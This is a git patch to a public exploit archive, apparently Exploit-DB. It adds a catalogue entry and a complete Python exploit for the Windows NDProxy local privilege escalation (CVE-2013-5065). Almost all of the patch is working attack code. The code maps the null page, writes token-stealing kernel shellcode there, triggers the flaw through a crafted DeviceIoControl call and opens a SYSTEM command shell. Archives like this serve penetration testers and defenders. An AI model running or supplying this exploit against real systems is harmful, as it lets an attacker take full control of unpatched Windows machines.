From 2039e282e8de526356ea3b7063a60b845b5de15e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 4 Dec 2013 05:28:26 +0000
Subject: [PATCH] Updated 12_04_2013

---
 files.csv | 1 +
 platforms/windows/local/30014.py | 79 ++++++++++++++++++++++++++++++++
 2 files changed, 80 insertions(+)
 create mode 100755 platforms/windows/local/30014.py

diff --git a/files.csv b/files.csv
index ee30f460b..901d1bfa3 100755
--- a/files.csv
+++ b/files.csv
@@ -26963,3 +26963,4 @@ id,file,description,date,author,platform,type,port
 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0
 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80
+30014,platforms/windows/local/30014.py,"NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,"Matteo Memelli",windows,local,0
diff --git a/platforms/windows/local/30014.py b/platforms/windows/local/30014.py
new file mode 100755
index 000000000..670df76f0
--- /dev/null
+++ b/platforms/windows/local/30014.py
@@ -0,0 +1,79 @@
+# NDPROXY Local SYSTEM privilege escalation
+# http://www.offensive-security.com
+# Tested on Windows XP SP3
+
+
+# Original crash ... null pointer dereference
+# Access violation - code c0000005 (!!! second chance !!!)
+# 00000038 ?? ???
+
+from ctypes import *
+from ctypes.wintypes import *
+import os, sys
+
+kernel32 = windll.kernel32
+ntdll = windll.ntdll
+
+GENERIC_READ = 0x80000000
+GENERIC_WRITE = 0x40000000
+FILE_SHARE_READ = 0x00000001
+FILE_SHARE_WRITE = 0x00000002
+NULL = 0x0
+OPEN_EXISTING = 0x3
+PROCESS_VM_WRITE = 0x0020
+PROCESS_VM_READ = 0x0010
+MEM_COMMIT = 0x00001000
+MEM_RESERVE = 0x00002000
+MEM_FREE = 0x00010000
+PAGE_EXECUTE_READWRITE = 0x00000040
+PROCESS_ALL_ACCESS = 2097151
+FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
+baseadd = c_int(0x00000001)
+MEMRES = (0x1000 | 0x2000)
+MEM_DECOMMIT = 0x4000
+PAGEEXE = 0x00000040
+null_size = c_int(0x1000)
+STATUS_SUCCESS = 0
+
+def log(msg):
+ print msg
+
+def getLastError():
+ """[-] Format GetLastError"""
+ buf = create_string_buffer(2048)
+ if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
+ kernel32.GetLastError(), 0,
+ buf, sizeof(buf), NULL):
+ log(buf.value)
+ else:
+ log("[-] Unknown Error")
+
+print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
+print "[*] Vulnerability found in the wild"
+print "[*] Coded by Offensive Security"
+
+tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24)
+InBuf = c_char_p(tmp)
+
+dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
+if dwStatus != STATUS_SUCCESS:
+ print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
+ getLastError()
+written = c_ulong()
+sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
+sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh))
+alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
+if alloc == 0:
+ print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
+ getLastError()
+
+dwRetBytes = DWORD(0)
+DEVICE_NAME = "\\\\.\\NDProxy"
+hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None)
+if hdev == -1:
+ print "[-] Couldn't open the device... :("
+ sys.exit()
+kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
+kernel32.CloseHandle(hdev)
+print "[+] Spawning SYSTEM Shell..."
+os.system("start /d \"C:\\windows\\system32\" cmd.exe")
\ No newline at end of file